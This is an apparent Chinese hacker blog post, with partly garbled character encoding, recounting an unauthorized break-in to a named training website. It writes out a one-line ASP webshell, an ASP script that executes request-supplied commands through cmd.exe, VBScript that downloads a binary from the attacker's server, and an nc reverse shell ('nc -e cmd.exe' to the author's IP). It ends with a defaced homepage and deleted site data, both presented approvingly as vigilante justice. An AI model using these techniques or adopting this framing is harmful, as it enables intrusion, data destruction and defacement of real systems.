最近在網(wǎng)上老是看到有人說被一個(gè)網(wǎng)址為“http://www.xuehk.com”的黑客培訓(xùn)機(jī)構(gòu)騙了錢，而且騙取的金額數(shù)目可不少。于是，抱著為民除 害的心態(tài)，準(zhǔn)備對(duì)這個(gè)所謂的黑客培訓(xùn)機(jī)構(gòu)進(jìn)行一次滲透。在網(wǎng)上搜索了一些關(guān)于這個(gè)網(wǎng)站的資料，得知，這個(gè)網(wǎng)站在前不久已經(jīng)被人黑過了，如果現(xiàn)在還要再次入 侵的話，成功的幾率可能比小，于是就叫上了幾個(gè)朋友一起搞。
打開“http://www.xuehk.com”，發(fā)現(xiàn)網(wǎng)站的頁(yè)面幾乎都是靜態(tài)的，如圖1所示。



整理好思路后，我決定先從主站入手。用阿D和明小子注入工具進(jìn)行了一次注入點(diǎn)掃面，結(jié)果無功而返，但這是我意料之中的事。然后，我變了一下思路，花了10多分鐘搜集齊了www.xuehk.com的所有目錄，目錄如下：
http://www.xuehk.com/
http://www.xuehk.com/book/
http://www.xuehk.com/vip/
http://www.xuehk.com/pojie/
http://www.xuehk.com/js/
http://www.xuehk.com/xz/
http://www.xuehk.com/zs/
http://www.xuehk.com/shop/
http://www.xuehk.com/yewu/
http://www.xuehk.com/zs/photo/xiao/
http://www.xuehk.com/zs/photo/da/
http://www.xuehk.com/zs/photo/
我分別用網(wǎng)站獵手和明小子注入工具的批量掃描功能對(duì)這些目錄進(jìn)行后臺(tái)掃描，然后我又用我自己加強(qiáng)過的NBSI一個(gè)一個(gè)的掃，結(jié)果依然是無功而返。看來從主 站入手是幾乎沒可能的了，于是乎開始旁注。打開“http://www.114best.com/ip/”對(duì)xuehk進(jìn)行旁注查詢，發(fā)現(xiàn)服務(wù)器上有很多 網(wǎng)站，很快我就找到了一個(gè)有漏洞的網(wǎng)站，如但是由于服務(wù)器安裝了比較強(qiáng)的殺軟，所以我只拿到了一個(gè)一句話webshell，圖2所示。



把 webshell丟給朋友后，我用lake2的一句話木馬客戶端查看了一下服務(wù)器信息，webshell所在的網(wǎng)站根目錄為“F:\wwwroot \****\wwwroot\”，****為網(wǎng)站域名的前段，所以，我推測(cè)xuehk.com的網(wǎng)站根目錄為“F:\wwwroot\xuehk \wwwroot\”，于是我馬上嘗試跳轉(zhuǎn)到此目錄，但是沒有權(quán)限。這時(shí)我想到asp.net的木馬權(quán)限可能會(huì)比asp的高一點(diǎn)，但是上傳好lake2的 asp.net一句話木馬后卻發(fā)現(xiàn)服務(wù)器不支持asp.net。
接著查看了一下終端信息，發(fā)現(xiàn)端口被改為了60015。查看了一下第三方軟件的信息，結(jié)果serv-u路徑找不到，而且默認(rèn)密碼改了，服務(wù)器上沒有安裝 PcanyWhere和Radmin，MSSQL和Mysql也沒有安裝，仔細(xì)再找了一下，也沒有發(fā)現(xiàn)什么可利用的第三方軟件，而且服務(wù)器的權(quán)限設(shè)置得很 死，連“開始→程序”都打不開。
上傳cmd.asp準(zhǔn)備嘗試執(zhí)行命令，但cmd.asp也被服務(wù)器的殺毒軟件給kill了，于是，自己操刀寫了個(gè)執(zhí)行cmd命令的asp腳本，代碼如下：



")
On Error Resume Next
response.write oScriptlhn.exec("cmd.exe /c" & request("c")).stdout.readall
response.write("")
response.write("")
response.write("
")
response.write("")
%>成功上傳到服務(wù)器后，執(zhí)行cmd.asp命令失敗。我想可能是管理員刪除了cmd.exe，也可能是服務(wù)器的權(quán)限設(shè)置問題，用一句話木馬查看服務(wù)器服務(wù)信 息發(fā)現(xiàn)Wscript并沒有被禁止，本想用Wscript來執(zhí)行命令，但是連一些能寫的目錄都找不到，常用的everyone目錄都不能用，至此，提權(quán)陷 入了死局。感覺沒什么意思，就跟朋友說了下情況出去玩了。
晚上回來的時(shí)候，朋友說找了N個(gè)小時(shí)，終于找到了一個(gè)能寫的目錄，目錄位置是“C:\Program Files\free3web~”，這著實(shí)嚇了我一跳，一個(gè)軟件的目錄居然能寫？打開這個(gè)目錄看了看，不知道是什么東西，就擱在了一邊。準(zhǔn)備把cmd上傳 到服務(wù)器的時(shí)候我又發(fā)現(xiàn)了一個(gè)問題，就是我該如何把二進(jìn)制文件傳上服務(wù)器呢？一句話木馬只支持文本上傳。有的朋友可能說用Wget.vbs來下載，但是你 想想，我們?cè)撛趺磮?zhí)行命令讓W(xué)get.vbs去下載文件呢？經(jīng)過一會(huì)兒的思考，我終于想到了一個(gè)辦法，不能上傳，但能下載吧？于是我在網(wǎng)上找到了一個(gè)可行 的辦法，就是利用Microsoft.XMLHTTP來下載文件到服務(wù)器上。我們先把cmd.exe傳上自己的網(wǎng)站上（為了減少體積，我用FSG壓縮了 cmd.exe?。缓蟠蜷_一句話木馬客戶端增強(qiáng)版，填好一句話木馬的信息后，把第三個(gè)框清空，再把第二個(gè)框的代碼換成：
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","被下載文件的網(wǎng)址",False
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath("保存的文件名"),2
set sGet = nothing
set sPOST = nothing
response.Write("下載成功！")再點(diǎn)擊“GO”按鈕后，一會(huì)兒文件就會(huì)被下載到服務(wù)器上了，如圖3、4所示。



上傳好cmd.exe后，在我剛才寫的cmd.asp腳本的代碼中把“cmd.exe”改為“C:\Program Files\free3web~\cmd.exe”，嘗試著執(zhí)行了一下命令，發(fā)現(xiàn)執(zhí)行成功！看來不需要用Wscript來執(zhí)行命令了，如圖5所示。



用 dir命令想查看F盤的文件，但是沒有權(quán)限，真是郁悶死我了，能執(zhí)行命令但又沒有利用價(jià)值，于是我就準(zhǔn)備在網(wǎng)上查一些關(guān)于服務(wù)器提權(quán)的文章，看看別人的提 權(quán)思路。誰(shuí)知我無意中看到一篇關(guān)于webshell下nc反彈的權(quán)限討論，仔細(xì)看過討論后得知原來用nc反彈回來的shell權(quán)限是比webshell權(quán)限高的！于是我馬上弄了一個(gè)我免殺過的nc到服務(wù)器上，在本地打開cmd，輸入命令“nc -vv -l -p 2006”，然后在webshell中輸入“c:\Program~\freeweb\nc.exe -e c:\Program~\freeweb\cmd.exe 我的IP 2006”，一會(huì)兒nc就有回應(yīng)了，我嘗試執(zhí)行命令“net user aa aa /add”，結(jié)果失敗，證明權(quán)限不是system，但當(dāng)我用命令“dir F:\wwwroot\xuehk\wwwroot\”的時(shí)候，居然成功的列出了xuehk.com網(wǎng)站的所有文件，如圖6所示。



然后我試著用echo命令來在xuehk.com寫一個(gè)文件，輸入
echo H4cked by 落葉紛飛>luoye.txt成功寫入了xuehk.com的網(wǎng)站根目錄，如圖7所示。



現(xiàn)在來echo一個(gè)一句話木馬吧！輸入
echo ^execute request^("l"^)^>luoye.asp成 功寫入luoye.asp，但因?yàn)榉?wù)器屏蔽了asp調(diào)試錯(cuò)誤的信息，所以打開luoye.asp時(shí)返回的頁(yè)面是500內(nèi)部錯(cuò)誤，但是這并不影響一句話木 馬的使用，我用lake2的一句話木馬客戶端連接上xuehk.com的一句話木馬后，用它的“Edit TextFile”功能把xuehk.com的首頁(yè)文件index.asp替換成了黑頁(yè)，并且在nc反彈回來的shell中將其數(shù)據(jù)完全刪除掉了，也算是 給他們一個(gè)小小的教訓(xùn)吧！總的來說，這次入侵的目的還是達(dá)到了。

最新評(píng)論